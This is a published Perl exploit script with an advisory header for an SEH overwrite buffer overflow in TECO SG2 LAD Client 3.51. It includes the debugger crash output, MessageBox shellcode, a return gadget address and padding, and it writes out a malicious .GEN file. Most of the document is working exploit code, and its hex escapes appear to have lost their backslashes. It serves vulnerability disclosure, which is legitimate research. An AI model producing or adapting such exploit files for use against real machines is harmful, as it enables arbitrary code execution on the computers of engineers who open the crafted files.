TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow
Posted on 17 November 2015
#!/usr/bin/perl # # # TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow Exploit # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9 # Affected version: 3.51 and 3.40 # # Summary: SG2 Client is a program that enables to create and edit applications. # The program is providing two edit modes, LADDER and FBD to rapidly and directly # input the required app. The Simulation Mode allows users to virtually run and test # the program before it is loaded to the controller. # # Desc: The vulnerability is caused due to a boundary error in the processing of a # Genie LAD file, which can be exploited to cause a buffer overflow when a user opens # e.g. a specially crafted .GEN file. Successful exploitation could allow execution # of arbitrary code on the affected machine. # # --------------------------------------------------------------------------------- # (10bc.1358): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=43434343 edx=7794b4ad esi=00000000 edi=00000000 # eip=43434343 esp=0018dc24 ebp=0018dc44 iopl=0 nv up ei pl zr na pe nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 # 43434343 ?? ??? # 0:000> !exchain # 0018dc38: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad) # 0018e1d4: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad) # 0018e800: MFC42!Ordinal1580+373 (708df2fc) # 0018f098: 43434343 # Invalid exception stack at 42424242 # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5275 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5275.php # # # 09.10.2015] # # 113 bytes MessageBox shellcode my $sc = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42". "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03". "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b". "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e". "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c". "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x65x64". "x21x01x68x20x50x77x6ex68x20x5ax53x4cx89xe1xfe". "x49x0bx31xc0x51x50xffxd7"; # Address = 0041D659 # Message = 0x0041d659 : pop edi # pop esi # ret 0x04 # startnull {PAGE_EXECUTE_READ} [LAD.exe] # ASLR: False; # Rebase: False; # SafeSEH: False; # OS: False; # v0.2.9.0 (C:Program Files (x86)TECOSG2 ClientLAD.exe) my $file = "lad.gen"; my $junk = "x41" x 21750 . "xEBx08x90x90" . "x59xd6x41x00" . "x90" x 28 . $sc . "x90" x 20; open($FILE,">$file"); print $FILE "$junk"; close($FILE); print "Malicious GEN file created successfully! ";
